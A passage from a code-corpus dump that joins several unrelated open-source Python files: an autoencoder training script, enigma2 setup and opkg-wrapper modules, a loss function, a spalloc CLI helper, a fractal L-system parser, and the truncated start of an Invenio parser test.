# BUILDING THE MODEL NO CORRUPTION #
####################################
rng = numpy.random.RandomState(123)
theano_rng = RandomStreams(rng.randint(2 ** 30))
#da = dA_joint(
#numpy_rng=rng,
#theano_rng=theano_rng,
#input1=x1,
#input2=x2,
#n_visible1=28 * 28/2,
#n_visible2=28 * 28/2,
#n_hidden=500
#)
print 'initialize functions'
da = dA_joint(
numpy_rng=rng,
theano_rng=theano_rng,
input1=x1,
input2=x2,
cor_reg=cor_reg,
#n_visible1=28 * 28/2,
#n_visible2=28 * 28/2,
n_visible1=24,
n_visible2=24,
n_hidden=50
)
cost, updates = da.get_cost_updates(
corruption_level=0.3,
learning_rate=learning_rate
)
cor_reg_val = numpy.float32(5.0)
train_da = theano.function(
[index],
cost,
updates=updates,
givens={
x1: train_set_x[index * batch_size: (index + 1) * batch_size],
x2: train_set_y[index * batch_size: (index + 1) * batch_size]
}
)
fprop_x1 = theano.function(
[],
outputs=da.output1,
givens={
x1: test_set_x
},
name='fprop_x1'
)
fprop_x2 = theano.function(
[],
outputs=da.output2,
givens={
x2: test_set_y
},
name='fprop_x2'
)
fprop_x1t = theano.function(
[],
outputs=da.output1,
givens={
x1: train_set_x
},
name='fprop_x1'
)
fprop_x2t = theano.function(
[],
outputs=da.output2,
givens={
x2: train_set_y
},
name='fprop_x2'
)
rec_x1 = theano.function(
[],
outputs=da.rec1,
givens={
x1: test_set_x
},
name='rec_x1'
)
rec_x2 = theano.function(
[],
outputs=da.rec2,
givens={
x2: test_set_y
},
name='rec_x2'
)
fprop_x1_to_x2 = theano.function(
[],
outputs=da.reg,
givens={
x1: test_set_x
},
name='fprop_x12x2'
)
updates_reg = [
(da.cor_reg, da.cor_reg+theano.shared(numpy.float32(0.1)))
]
update_reg = theano.function(
[],
updates=updates_reg
)
print 'initialize functions ended'
start_time = time.clock()
############
# TRAINING #
############
print 'training started'
X1=test_set_x.eval()
X1 *= x_std
X1 += x_mean
X2=test_set_y.eval()
X2 *= y_std
X2 += y_mean
from dcca_numpy import cor_cost
# go through training epochs
for epoch in xrange(training_epochs):
# go through trainng set
c = []
for batch_index in xrange(n_train_batches):
c.append(train_da(batch_index))
#cor_reg_val += 1
#da.cor_reg = theano.shared(cor_reg_val)
update_reg()
X1H=rec_x1()
X2H=rec_x2()
X1H *= x_std
X1H += x_mean
X2H *= y_std
X2H += y_mean
H1=fprop_x1()
H2=fprop_x2()
print 'Training epoch'
print 'Reconstruction ', numpy.mean(numpy.mean((X1H-X1)**2,1)),\
numpy.mean(numpy.mean((X2H-X2)**2,1))
if epoch%5 == 2 : # pretrain middle layer
print '... pre-training MIDDLE layer'
H1t=fprop_x1t()
H2t=fprop_x2t()
h1 = T.matrix('x') # the data is presented as rasterized images
h2 = T.matrix('y') # the labels are presented as 1D vector of
from mlp import HiddenLayer
numpy_rng = numpy.random.RandomState(89677)
log_reg = HiddenLayer(numpy_rng, h1, 50, 50, activation=T.tanh)
if 1: # for middle layer
learning_rate = 0.1
#H1=theano.shared(H1)
#H2=theano.shared(H2)
# compute the gradients with respect to the model parameters
logreg_cost = log_reg.mse(h2)
gparams = T.grad(logreg_cost, log_reg.params)
# compute list of fine-tuning updates
updates = [
(param, param - gparam * learning_rate)
for param, gparam in zip(log_reg.params, gparams)
]
train_fn_middle = theano.function(
inputs=[],
outputs=logreg_cost,
updates=updates,
givens={
h1: theano.shared(H1t),
h2: theano.shared(H2t)
},
name='train_middle'
)
epoch = 0
while epoch < 100:
print epoch, train_fn_middle()
epoch += 1
##X2H=fprop_x1_to_x2()
X2H=numpy.tanh(H1.dot(log_reg.W.eval())+log_reg.b.eval())
X2H=numpy.tanh(X2H.dot(da.W2_prime.eval())+da.b2_prime.eval())
X2H *= y_std
X2H += y_mean
print 'Regression ', numpy.mean(numpy.mean((X2H-X2)**2,1))
print 'Correlation ', cor_cost(H1, H2)
end_time = time.clock()
training_time = (end_time - start_time)
print >> sys.stderr, ('The no corruption code for file ' +
os.path.split(__file__)[1] +
' ran for %.2fm' % ((training_time) / 60.))
image = Image.fromarray(
tile_raster_images(X=da.W1.get_value(borrow=True).T,
img_shape=(28, 14), tile_shape=(10, 10),
tile_spacing=(1, 1)))
image.save('filters_corruption_0.png')
from matplotlib import pyplot as pp
pp.plot(H1[:10,:2],'b');pp.plot(H2[:10,:2],'r');pp.show()
print cor
if __name__ == '__main__':
test_dA() | shamidreza/deepcca | dA_joint.py | Python | gpl-2.0 | 21,666 |
from Screen import Screen
from Components.ActionMap import NumberActionMap
from Components.config import config, ConfigNothing, ConfigBoolean, ConfigSelection
from Components.Label import Label
from Components.SystemInfo import SystemInfo
from Components.ConfigList import ConfigListScreen
from Components.Pixmap import Pixmap
from Components.Sources.StaticText import StaticText
from Components.Sources.Boolean import Boolean
from enigma import eEnv
import xml.etree.cElementTree
# FIXME: use resolveFile!
# read the setupmenu
try:
# first we search in the current path
setupfile = file('data/setup.xml', 'r')
except:
# if not found in the current path, we use the global datadir-path
setupfile = file(eEnv.resolve('${datadir}/enigma2/setup.xml'), 'r')
setupdom = xml.etree.cElementTree.parse(setupfile)
setupfile.close()
def getConfigMenuItem(configElement):
for item in setupdom.getroot().findall('./setup/item/.'):
if item.text == configElement:
return _(item.attrib["text"]), eval(configElement)
return "", None
class SetupError(Exception):
def __init__(self, message):
self.msg = message
def __str__(self):
return self.msg
class SetupSummary(Screen):
def __init__(self, session, parent):
Screen.__init__(self, session, parent=parent)
self["SetupTitle"] = StaticText(parent.getTitle())
self["SetupEntry"] = StaticText("")
self["SetupValue"] = StaticText("")
self.onShow.append(self.addWatcher)
self.onHide.append(self.removeWatcher)
def addWatcher(self):
if hasattr(self.parent, "onChangedEntry"):
self.parent.onChangedEntry.append(self.selectionChanged)
self.parent["config"].onSelectionChanged.append(self.selectionChanged)
self.selectionChanged()
def removeWatcher(self):
if hasattr(self.parent, "onChangedEntry"):
self.parent.onChangedEntry.remove(self.selectionChanged)
self.parent["config"].onSelectionChanged.remove(self.selectionChanged)
def selectionChanged(self):
self["SetupEntry"].text = self.parent.getCurrentEntry()
self["SetupValue"].text = self.parent.getCurrentValue()
if hasattr(self.parent, "getCurrentDescription") and "description" in self.parent:
self.parent["description"].text = self.parent.getCurrentDescription()
class Setup(ConfigListScreen, Screen):
ALLOW_SUSPEND = True
def __init__(self, session, setup):
Screen.__init__(self, session)
# for the skin: first try a setup_<setupID>, then Setup
self.skinName = ["setup_" + setup, "Setup"]
self.list = []
self.force_update_list = False
xmldata = setupdom.getroot()
for x in xmldata.findall("setup"):
if x.get("key") == setup:
self.setup = x
break
self.setup_title = self.setup.get("title", "").encode("UTF-8")
self.seperation = int(self.setup.get('separation', '0'))
#check for list.entries > 0 else self.close
self["key_red"] = StaticText(_("Cancel"))
self["key_green"] = StaticText(_("OK"))
self["description"] = Label("")
self["HelpWindow"] = Pixmap()
self["HelpWindow"].hide()
self["VKeyIcon"] = Boolean(False)
self["actions"] = NumberActionMap(["SetupActions", "MenuActions"],
{
"cancel": self.keyCancel,
"save": self.keySave,
"menu": self.closeRecursive,
}, -2)
ConfigListScreen.__init__(self, self.list, session=session, on_change=self.changedEntry)
self.createSetupList()
self["config"].onSelectionChanged.append(self.__onSelectionChanged)
self.setTitle(_(self.setup_title))
def createSetupList(self):
currentItem = self["config"].getCurrent()
self.list = []
for x in self.setup:
if not x.tag:
continue
if x.tag == 'item':
item_level = int(x.get("level", 0))
if item_level > config.usage.setup_level.index:
continue
requires = x.get("requires")
if requires:
if requires.startswith('!'):
if SystemInfo.get(requires[1:], False):
continue
elif not SystemInfo.get(requires, False):
continue
conditional = x.get("conditional")
if conditional and not eval(conditional):
continue
item_text = _(x.get("text", "??").encode("UTF-8"))
item_description = _(x.get("description", " ").encode("UTF-8")) # don't change
b = eval(x.text or "")
if b == "":
continue
#add to configlist
item = b
# the first b is the item itself, ignored by the configList.
# the second one is converted to string.
if not isinstance(item, ConfigNothing):
self.list.append((item_text, item, item_description))
self["config"].setList(self.list)
if config.usage.sort_settings.value:
self["config"].list.sort()
self.moveToItem(currentItem)
def moveToItem(self, item):
if item != self["config"].getCurrent():
self["config"].setCurrentIndex(self.getIndexFromItem(item))
def getIndexFromItem(self, item):
return self["config"].list.index(item) if item in self["config"].list else 0
def changedEntry(self):
if isinstance(self["config"].getCurrent()[1], ConfigBoolean) or isinstance(self["config"].getCurrent()[1], ConfigSelection):
self.createSetupList()
def __onSelectionChanged(self):
if self.force_update_list:
self["config"].onSelectionChanged.remove(self.__onSelectionChanged)
self.createSetupList()
self["config"].onSelectionChanged.append(self.__onSelectionChanged)
self.force_update_list = False
if not (isinstance(self["config"].getCurrent()[1], ConfigBoolean) or isinstance(self["config"].getCurrent()[1], ConfigSelection)):
self.force_update_list = True
def run(self):
self.keySave()
def getSetupTitle(id):
xmldata = setupdom.getroot()
for x in xmldata.findall("setup"):
if x.get("key") == id:
return x.get("title", "").encode("UTF-8")
raise SetupError("unknown setup id '%s'!" % repr(id))
| blzr/enigma2 | lib/python/Screens/Setup.py | Python | gpl-2.0 | 5,693 |
'''
A set of (smooth) loss functions.
Created on Oct 2, 2014
@author: jiayu.zhou
'''
import numpy as np;
def least_squares(w, X, y):
'''
least squares loss.
MATLAB verified function.
f(x) = 1/2 * ||X * w - y||_F^2.
Parameters
----------
w: np.matrix
X: np.matrix
y: np.matrix
Returns
----------
'''
Xw_y = np.dot(X, w) - y;
f = 0.5 * np.linalg.norm(Xw_y, 'fro')**2;
g = np.dot(X.T, Xw_y);
g = g.reshape(g.shape[0] * g.shape[1] , 1, order = 'F');
return [f, g]; | jiayuzhou/pyProxSolver | org/jiayu/optimization/smooth.py | Python | gpl-2.0 | 563 |
# Copyright (c) 2016-2019 The University of Manchester
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
from spalloc import (
config, ProtocolClient, ProtocolError, ProtocolTimeoutError,
SpallocServerException)
# The acceptable range of server version numbers
VERSION_RANGE_START = (0, 1, 0)
VERSION_RANGE_STOP = (5, 0, 1)
class Terminate(Exception):
def __init__(self, code, *args):
super().__init__()
self._code = code
args = list(args)
message = args.pop(0) if args else None
if message is None:
self._msg = None
elif args:
self._msg = message.format(*args)
else:
self._msg = message
def exit(self):
if self._msg is not None:
sys.stderr.write(self._msg + "\n")
sys.exit(self._code)
def version_verify(client, timeout):
version = tuple(map(int, client.version(timeout=timeout).split(".")))
if not (VERSION_RANGE_START <= version < VERSION_RANGE_STOP):
raise Terminate(2, "Incompatible server version ({})",
".".join(map(str, version)))
class Script(object):
def __init__(self):
self.client_factory = ProtocolClient
def get_parser(self, cfg):
""" Return a set-up instance of :py:class:`argparse.ArgumentParser`
"""
raise NotImplementedError
def verify_arguments(self, args):
""" Check the arguments for sanity and do any second-stage parsing\
required.
"""
def body(self, client, args):
""" How to do the processing of the script once a client has been\
obtained and verified to be compatible.
"""
def build_server_arg_group(self, server_args, cfg):
server_args.add_argument(
"--hostname", "-H", default=cfg["hostname"],
help="hostname or IP of the spalloc server (default: %(default)s)")
server_args.add_argument(
"--port", "-P", default=cfg["port"], type=int,
help="port number of the spalloc server (default: %(default)s)")
server_args.add_argument(
"--timeout", default=cfg["timeout"], type=float, metavar="SECONDS",
help="seconds to wait for a response from the server (default: "
"%(default)s)")
server_args.add_argument(
"--ignore_version", default=cfg["ignore_version"], type=bool,
help="Ignore the server version (WARNING: could result in errors) "
"default: %(default)s)")
def __call__(self, argv=None):
cfg = config.read_config()
parser = self.get_parser(cfg)
server_args = parser.add_argument_group("spalloc server arguments")
self.build_server_arg_group(server_args, cfg)
args = parser.parse_args(argv)
# Fail if server not specified
if args.hostname is None:
parser.error("--hostname of spalloc server must be specified")
self.verify_arguments(args)
try:
with self.client_factory(args.hostname, args.port) as client:
if not args.ignore_version:
version_verify(client, args.timeout)
self.body(client, args)
return 0
except (IOError, OSError, ProtocolError, ProtocolTimeoutError) as e:
sys.stderr.write("Error communicating with server: {}\n".format(e))
return 1
except SpallocServerException as srv_exn:
sys.stderr.write("Error from server: {}\n".format(srv_exn))
return 1
except Terminate as t:
t.exit()
| project-rig/spalloc | spalloc/scripts/support.py | Python | gpl-2.0 | 4,226 |
#!/usr/bin/python
# Copyright (C) 2002 Noufal Ibrahim <noufal@cisco.com>
#
# This program is part of PfractL
#
# PfractL is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
from graphics import *
from editor import *
from FileDialog import *
from console import *
import math
import sys
import re
import stack
import pickle
logger=None
class parser(viewbox):
"Draws a string specified in our little language"
def autocomplete(self):
"Completes fractal components that are unspecified"
logger ("Checking for incomplete entries",MESG)
if (self.fractal.has_key('Rgen') and (not self.fractal.has_key('Lgen'))):
logger ("Autogenerating Lgen from Rgen:"+self.fractal['Rgen'],MESG)
temp=self.fractal['Rgen']
## All plusses with minuses
temp=re.sub("\+",".",temp)
temp=re.sub("-","+",temp)
temp=re.sub("\.","-",temp)
## All Rs with Ls and vice versa
temp=re.sub("R",".",temp)
temp=re.sub("L","R",temp)
temp=re.sub("\.","L",temp)
logger ("Lgen:"+temp,MESG)
self.fractal['Lgen']=temp
if (self.fractal.has_key('Lgen') and (not self.fractal.has_key('Rgen'))):
logger ("Autogenerating Rgen from Lgen:"+self.fractal['Lgen'],MESG)
temp=self.fractal['Lgen']
## All plusses with minuses and vice versa
temp=re.sub("\+",".",temp)
temp=re.sub("-","+",temp)
temp=re.sub("\.","-",temp)
## All Rs with Ls and vice versa
temp=re.sub("R",".",temp)
temp=re.sub("L","R",temp)
temp=re.sub("\.","L",temp)
logger("Rgen:"+temp,MESG)
self.fractal['Rgen']=temp
if(self.fractal.has_key('name')):
self.title(self.fractal['name'])
else:
logger("Fractal name string not found",MESG)
self.title("Unspecified")
if(self.fractal.has_key('xpos') and self.fractal.has_key('ypos')):
self.x,self.y=self.fractal['xpos'],self.fractal['ypos']
else:
logger ("Fractal starting point unspecified",MESG)
logger ("Using (132,"+str(HEIGHT-369)+")",MESG)
self.fractal['xpos'],self.fractal['ypos']=132,HEIGHT-369
self.x=132
self.y=HEIGHT-369
if (not self.fractal.has_key('maxlevel')):
logger("Fractal maximum level depth unspecified",MESG)
logger("Using default 6",MESG)
self.fractal["maxlevel"]=6
if (not self.fractal.has_key('sangle')):
logger("Fractal starting angle unspecified",MESG)
logger("Using default 0",MESG)
self.fractal['sangle']=0
self.level=1
self.reset()
#Functions that handle all the artwork.
def renderstring(self,string,level):
"The actual parser that recognises the language"
for i in string:
# print "angle :: " ,self.cangle
# raw_input()
if i=='D': #Basic line
if (level == 1):
self.drawline(i)
# print i,
else:
# print "Before: " + str(self.fractal['length'])
self.fractal['length']=self.fractal['length']/self.fractal['divisor']
# print "expanding D into",self.fractal['Dgen'],level
self.renderstring(self.fractal['Dgen'],level-1)
self.fractal['length']=self.fractal['length']*self.fractal['divisor']
# print "After: " + str(self.fractal['length'])
elif i=='T':
if (level == 1):
self.drawline(i)
# print i,
else:
self.fractal['length']=self.fractal['length']/self.fractal['divisor']
# print "expanding T into",self.fractal['Tgen'],level
self.renderstring(self.fractal['Tgen'],level-1)
self.fractal['length']=self.fractal['length']*self.fractal['divisor']
elif i=='d':
if (level == 1):
self.movepointer()
else:
self.fractal['length']=self.fractal['length']/self.fractal['divisor']
self.renderstring(self.fractal['dgen'],level-1)
self.fractal['length']=self.fractal['length']*self.fractal['divisor']
elif i=='R':
if (level == 1):
self.drawline(i)
# print i,
else:
self.fractal['length']=self.fractal['length']/self.fractal['divisor']
# print "expanding R into",self.fractal['Rgen'],level
self.renderstring(self.fractal['Rgen'],level-1)
self.fractal['length']=self.fractal['length']*self.fractal['divisor']
elif i=='L':
if (level == 1):
self.drawline(i)
# print i,
else:
self.fractal['length']=self.fractal['length']/self.fractal['divisor']
# print "expanding L into",self.fractal['Lgen'],level
self.renderstring(self.fractal['Lgen'],level-1)
self.fractal['length']=self.fractal['length']*self.fractal['divisor']
elif i=='X':
if (level == 1):
self.drawline(i)
# print i,
elif i=='B':
self.drawline(i)
# print i,
elif i=='[':
self.bstack.push((self.x,self.y,self.cangle))
elif i==']':
(self.x,self.y,self.cangle)=self.bstack.pop()
elif i=='+':
## if (level == 1):
## print "+",
## if (level == 2):
## print ".+."
self.incrementangle()
elif i=="-":
## if (level == 1):
## print "-",
## if (level == 2):
## print ".-."
self.decrementangle()
else:
print "Invalid command character :",i
sys.exit(-1)
def drawline(self,symbol):
"Draws a line of the current length in the current direction"
x=self.x
y=self.y
a=self.fractal['length']
theta=self.cangle
tx=x + a*math.cos(self.factor*theta)
ty=y + a*math.sin(self.factor*theta)
self.line(x,y,tx,ty,symbol)
self.x=tx
self.y=ty
def movepointer(self):
"Simply moves the pointer in the current direction"
x=self.x
y=self.y
a=self.fractal['length']
theta=self.cangle
tx=x + a*math.cos(self.factor*theta)
ty=y + a*math.sin(self.factor*theta)
self.x=tx
self.y=ty
def incrementangle(self):
if (self.grammarflag == 1):
self.printmarker(self.x,self.y,'+',"blue")
self.cangle=self.cangle+self.fractal['angle']
def decrementangle(self):
if (self.grammarflag == 1):
self.printmarker(self.x,self.y,'-',"blue")
self.cangle=self.cangle-self.fractal['angle']
def redraw(self):
"""Redraws the fractal but I'm not sure of the details yet."""
self.clear()
self.renderstring(self.fractal['axiom'],self.level)
self.reset()
###################### #Callbacks for the buttons and stuff. ##################
def deactivatebuttons(self):
"Disables all the buttons"
for i in self.blist:
i.configure(state="disabled")
def deactivatemenus(self):
"Disables menu entries"
for i in self.mlist:
i[0].entryconfig(i[1],state="disabled")
def activatebuttons(self):
"Enables buttons"
for i in self.blist:
i.configure(state="normal")
def activatemenus(self):
"Enables menu items"
for i in self.mlist:
i[0].entryconfig(i[1],state="normal")
def pluscallback(self):
"What happens when the plus button is pressed"
self.deactivatebuttons() #Disable everything
self.deactivatemenus()
level=self.level #Increment, clear the canvas and redraw
if level != self.fractal['maxlevel']:
level=level+1
fractl.clear()
fractl.generatefractal(level)
else:
self.mesg ("Max level reached")
self.activatebuttons() #Reactivate everything
self.activatemenus()
def minuscallback(self):
"What happens when the minus button is pressed"
self.deactivatebuttons() #Disable everything
self.deactivatemenus()
level=self.level #Decrement and draw after clearing
if level != 1:
level=level-1
fractl.clear()
fractl.generatefractal(level)
else:
self.mesg ("Can't go less than 1")
self.activatebuttons() #Reactivate everything
self.activatemenus()
def poscallback(self,event):
"""Temporary binding for canvas.
Changes canvas behaviour to enable starting point selection.
Restores left mouse key after this is done and """
self.x,self.y=self.convert(event.x,event.y)
self.fractal['xpos'],self.fractal['ypos']=self.x,self.y
logger(str(event.x)+str(event.y),MESG)
self.canvas.unbind("<Button-1>")
self.canvas.configure(cursor="left_ptr")
self.mesg("")
def selectcallback(self):
"""Point selection callback. The callback for the button that
handles the starting point selection"""
self.mesg("Select starting point")
self.canvas.configure(cursor="crosshair")
self.canvas.bind("<Button-1>",self.poscallback)
def infocallback(self):
"Callback for the editor"
editor=fractaleditor(self)
def fileloadcallback(self):
"The dialog box etc. for the load menu item"
fd=FileDialog(self.root)
file=fd.go(".","*.pf")
# print " ***************** To load fractal file:", file,":" # DEBUG
if(file != None):
try:
f=open(file,"r")
except IOError:
self.mesg("No such file")
logger("No such file :"+file,ERROR)
self.activatebuttons()
return
self.fractal=pickle.load(f)
f.close()
logger("Loaded fractal file "+file,SPL)
self.autocomplete()
self.cangle=self.fractal['sangle']
fractl.redraw()
self.activatebuttons()
else:
self.mesg("Invalid file")
logger("Invalid file name :"+file,ERROR)
def filesavecallback(self):
"The dialog box etc. for the save menu item"
fd=FileDialog(self.root)
file=fd.go(".","*.pf")
if (file != None):
f=open(file,"w")
pickle.dump(self.fractal,f)
f.close()
logger("File "+file+" saved",SPL)
self.activatebuttons()
else:
self.mesg("Invalid file")
logger("Invalid file name",ERROR)
def consolecallback(self):
global logger
self.console=messageconsole(self,logger,self.loggerdummy)
logger=self.console.cprint
######################### Public interfaces ################################
def generatefractal(self,level):
self.level=level
self.mesg("Creating fractal - Level:"+str(self.level))
self.renderstring(self.fractal['axiom'],self.level)
self.mesg ("Level:"+str(self.level))
if (self.markerflag == 1):
self.marksegments()
self.reset()
def reset(self):
"Resets dynamic parameters"
self.x,self.y=self.fractal['xpos'],self.fractal['ypos']
self.cangle=self.fractal['sangle']
def loggerdummy(self,t1,t2):
pass
## def temp_stub(self):
## self.fractal={"name":"Testing",\
## "ypos":454.0,\
## "maxlevel":12.0,\
## "sangle":0.0,\
## "xpos":74.0,\
## "Lgen":"+RDX-LDL-XDR+",\
## "Rgen":"-LDX+RDR+XDL-",\
## "Dgen":"DXX",\
## "divisor":2.33333,\
## "angle":90.0,\
## "length":200,\
## "axiom":"L"
## }
def __init__(self):
"Initialises parser components"
#Starting coordinates and angle
# self.temp_stub()
global logger
logger=self.loggerdummy
self.bstack=stack.Stack()
self.lstack=stack.Stack()
self.factor=math.pi/180.0 #rad to degree
self.level=1
self.initialise(bg="#ffe4b5",fg="chocolate") #Set up graphics routines
self.setcallbacks(plus=self.pluscallback,\
minus=self.minuscallback,\
select=self.selectcallback,\
query=self.infocallback,\
console=self.consolecallback,\
loadfile=self.fileloadcallback,\
savefile=self.filesavecallback)
try:
if self.fractal:
pass
except AttributeError:
self.deactivatebuttons()
fractl=parser()
def main():
global fractl
fractl.map()
fractl.generatefractal(1)
main()
| nibrahim/PFractL | PfractL.py | Python | gpl-2.0 | 14,705 |
import os
from enigma import eConsoleAppContainer
from Components.Harddisk import harddiskmanager
opkgDestinations = []
opkgStatusPath = ''
def opkgExtraDestinations():
global opkgDestinations
return ''.join([" --dest %s:%s" % (i,i) for i in opkgDestinations])
def opkgAddDestination(mountpoint):
pass
#global opkgDestinations
#if mountpoint not in opkgDestinations:
#opkgDestinations.append(mountpoint)
#print "[Ipkg] Added to OPKG destinations:", mountpoint
def onPartitionChange(why, part):
global opkgDestinations
global opkgStatusPath
mountpoint = os.path.normpath(part.mountpoint)
if mountpoint and mountpoint != '/':
if why == 'add':
if opkgStatusPath == '':
# older opkg versions
opkgStatusPath = 'usr/lib/opkg/status'
if not os.path.exists(os.path.join('/', opkgStatusPath)):
# recent opkg versions
opkgStatusPath = 'var/lib/opkg/status'
if os.path.exists(os.path.join(mountpoint, opkgStatusPath)):
opkgAddDestination(mountpoint)
elif why == 'remove':
try:
opkgDestinations.remove(mountpoint)
print "[Ipkg] Removed from OPKG destinations:", mountpoint
except:
pass
harddiskmanager.on_partition_list_change.append(onPartitionChange)
for part in harddiskmanager.getMountedPartitions():
onPartitionChange('add', part)
class IpkgComponent:
EVENT_INSTALL = 0
EVENT_DOWNLOAD = 1
EVENT_INFLATING = 2
EVENT_CONFIGURING = 3
EVENT_REMOVE = 4
EVENT_UPGRADE = 5
EVENT_LISTITEM = 9
EVENT_DONE = 10
EVENT_ERROR = 11
EVENT_MODIFIED = 12
CMD_INSTALL = 0
CMD_LIST = 1
CMD_REMOVE = 2
CMD_UPDATE = 3
CMD_UPGRADE = 4
CMD_UPGRADE_LIST = 5
def __init__(self, ipkg = 'opkg'):
self.ipkg = ipkg
self.cmd = eConsoleAppContainer()
self.cache = None
self.callbackList = []
self.setCurrentCommand()
def setCurrentCommand(self, command = None):
self.currentCommand = command
def runCmdEx(self, cmd):
self.runCmd(opkgExtraDestinations() + ' ' + cmd)
def runCmd(self, cmd):
print "executing", self.ipkg, cmd
self.cmd.appClosed.append(self.cmdFinished)
self.cmd.dataAvail.append(self.cmdData)
if self.cmd.execute(self.ipkg + " " + cmd):
self.cmdFinished(-1)
def startCmd(self, cmd, args = None):
if cmd is self.CMD_UPDATE:
self.runCmdEx("update")
elif cmd is self.CMD_UPGRADE:
append = ""
if args["test_only"]:
append = " -test"
self.runCmdEx("upgrade" + append)
elif cmd is self.CMD_LIST:
self.fetchedList = []
if args['installed_only']:
self.runCmdEx("list_installed")
else:
self.runCmd("list")
elif cmd is self.CMD_INSTALL:
self.runCmd("install " + args['package'])
elif cmd is self.CMD_REMOVE:
self.runCmd("remove " + args['package'])
elif cmd is self.CMD_UPGRADE_LIST:
self.fetchedList = []
self.runCmdEx("list_upgradable")
self.setCurrentCommand(cmd)
def cmdFinished(self, retval):
self.callCallbacks(self.EVENT_DONE)
self.cmd.appClosed.remove(self.cmdFinished)
self.cmd.dataAvail.remove(self.cmdData)
def cmdData(self, data):
print "data:", data
if self.cache is None:
self.cache = data
else:
self.cache += data
if '\n' in data:
splitcache = self.cache.split('\n')
if self.cache[-1] == '\n':
iteration = splitcache
self.cache = None
else:
iteration = splitcache[:-1]
self.cache = splitcache[-1]
for mydata in iteration:
if mydata != '':
self.parseLine(mydata)
def parseLine(self, data):
if self.currentCommand in (self.CMD_LIST, self.CMD_UPGRADE_LIST):
item = data.split(' - ', 2)
if len(item) < 3:
self.callCallbacks(self.EVENT_ERROR, None)
return
self.fetchedList.append(item)
self.callCallbacks(self.EVENT_LISTITEM, item)
return
try:
if data[:11] == 'Downloading':
self.callCallbacks(self.EVENT_DOWNLOAD, data.split(' ', 5)[1].strip())
elif data[:9] == 'Upgrading':
self.callCallbacks(self.EVENT_UPGRADE, data.split(' ', 2)[1])
elif data[:10] == 'Installing':
self.callCallbacks(self.EVENT_INSTALL, data.split(' ', 2)[1])
elif data[:8] == 'Removing':
self.callCallbacks(self.EVENT_REMOVE, data.split(' ', 3)[2])
elif data[:11] == 'Configuring':
self.callCallbacks(self.EVENT_CONFIGURING, data.split(' ', 2)[1])
elif data[:17] == 'An error occurred':
self.callCallbacks(self.EVENT_ERROR, None)
elif data[:18] == 'Failed to download':
self.callCallbacks(self.EVENT_ERROR, None)
elif data[:21] == 'ipkg_download: ERROR:':
self.callCallbacks(self.EVENT_ERROR, None)
elif 'Configuration file \'' in data:
# Note: the config file update question doesn't end with a newline, so
# if we get multiple config file update questions, the next ones
# don't necessarily start at the beginning of a line
self.callCallbacks(self.EVENT_MODIFIED, data.split(' \'', 3)[1][:-1])
except Exception, ex:
print "[Ipkg] Failed to parse: '%s'" % data
print "[Ipkg]", ex
def callCallbacks(self, event, param = None):
for callback in self.callbackList:
callback(event, param)
def addCallback(self, callback):
self.callbackList.append(callback)
def removeCallback(self, callback):
self.callbackList.remove(callback)
def getFetchedList(self):
return self.fetchedList
def stop(self):
self.cmd.kill()
def isRunning(self):
return self.cmd.running()
def write(self, what):
if what:
# We except unterminated commands
what += "\n"
self.cmd.write(what, len(what))
| kingvuplus/Test-OBH | lib/python/Components/Ipkg.py | Python | gpl-2.0 | 5,412 |
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014, 2015 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Unit tests for the parser engine."""
__revision__ = \
"$Id$"
import tempfile
from flask.ext.registry import PkgResourcesDirDiscoveryRegistry, \
ImportPathRegistry, RegistryProxy
from invenio.base.wrappers import lazy_import
from invenio.testsuite import make_test_suite, run_test_suite, InvenioTestCase
Field_parser = lazy_import('invenio.modules.jsonalchemy.parser:FieldParser')
Model_parser = lazy_import('invenio.modules.jsonalchemy.parser:ModelParser')
guess_legacy_field_names = lazy_import(
'invenio.modules.jsonalchemy.parser:guess_legacy_field_names')
get_producer_rules = lazy_import(
'invenio.modules.jsonalchemy.parser:get_producer_rules')
TEST_PACKAGE = 'invenio.modules.jsonalchemy.testsuite'
test_registry = RegistryProxy('testsuite', ImportPathRegistry,
initial=[TEST_PACKAGE])
field_definitions = lambda: PkgResourcesDirDiscoveryRegistry(
'fields', registry_namespace=test_registry)
model_definitions = lambda: PkgResourcesDirDiscoveryRegistry(
'models', registry_namespace=test_registry)
def clean_field_model_definitions():
Field_parser._field_definitions = {}
Field_parser._legacy_field_matchings = {}
Model_parser._model_definitions = {}
class TestParser(InvenioTestCase):
def setUp(self):
self.app.extensions['registry'][
'testsuite.fields'] = field_definitions()
self.app.extensions['registry'][
'testsuite.models'] = model_definitions()
def tearDown(self):
del self.app.extensions['registry']['testsuite.fields']
del self.app.extensions['registry']['testsuite.models']
def test_wrong_indent(self):
"""JSONAlchemy - wrong indent"""
from invenio.modules.jsonalchemy.parser import _create_field_parser
import pyparsing
parser = _create_field_parser()
test = """
foo:
creator:
bar, '1', foo()
"""
self.assertRaises(pyparsing.ParseException, parser.parseString, test)
from invenio.modules.jsonalchemy.errors import FieldParserException
tmp_file = tempfile.NamedTemporaryFile()
config = """
foo:
creator:
bar, '1', foo()
"""
tmp_file.write(config)
tmp_file.flush()
self.app.extensions['registry'][
'testsuite.fields'].register(tmp_file.name)
clean_field_model_definitions()
self.assertRaises(
